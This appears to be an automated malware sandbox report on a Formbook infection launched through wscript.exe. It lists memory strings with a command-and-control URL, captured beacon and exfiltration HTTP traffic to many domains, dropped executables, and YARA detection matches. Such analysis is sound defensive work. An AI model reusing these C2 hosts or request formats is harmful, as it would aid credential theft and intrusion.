Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr
Source: wscript.exe, 00000006.00000003.574065637.000001A548036000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573367613.000001A54800B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_ndefender://%ProgramFiles%
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 0000000F.00000002.804315845.0000023E30F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrec&
Source: wscript.exe, 00000001.00000003.384485036.000001B74541E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384967035.000001B745438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vredir=C:
Source: wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615434435.0000023E2EF6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615093241.0000023E2EF6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrelderViewDual2WWW
Source: wscript.exe, 00000001.00000002.786905329.000001B742D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.788325746.0000023E2EE92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2
Source: wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2oft6
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.614567898.0000023E2EF58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.616305170.0000023E2EF5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000006.00000002.788120944.000001A547F90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoH
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoKo
Source: wscript.exe, 00000001.00000003.384955138.000001B742E0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreoftows
Source: wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrerd
Source: wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrerwl
Source: wscript.exe, 00000001.00000002.797140717.000001B744CB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788082971.000001A547F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799403511.0000010D37DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.798112054.0000023E30EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.384727755.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrex.
Source: explorer.exe, 00000004.00000000.332347310.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.369067686.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398054768.000000000DDE9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.co
Source: cmmon32.exe, 00000012.00000002.837908530.0000000005BFB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.o7oiwlp.xyz
Source: cmmon32.exe, 00000012.00000002.837908530.0000000005BFB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.o7oiwlp.xyz/np8s/
Source: wscript.exe, 00000006.00000003.757128359.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.436100065.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.757440030.000001A547FD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573645554.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574280923.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.788220340.000001A547FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615176413.0000010D38418000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.799462457.0000010D383C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.615795010.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804264808.0000023E30F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714217538.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com;
Source: cmmon32.exe, 00000012.00000002.827061760.0000000005582000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.interlink-travel.com/np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC7
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii:
c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvJFJ21PsUjiZ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1ClRHn4SxuGj&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7QpXUX37idvZ6&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SaZV+ETfGqRGg8UpLQ9gT5lpaRa7t1Wyj9mLK06zGilC1KjP8kiErJAXediVB/P9DJGG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.2264a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=sGHpREHB6zr3UC4aQViiUpNRv9hYNnMtmn0rCl8QdyZ+urDz6JFWhhwh7EVf+dC28syJ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.heavymettlelawyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED

System Summary

Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.291278262.000001E33FAD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
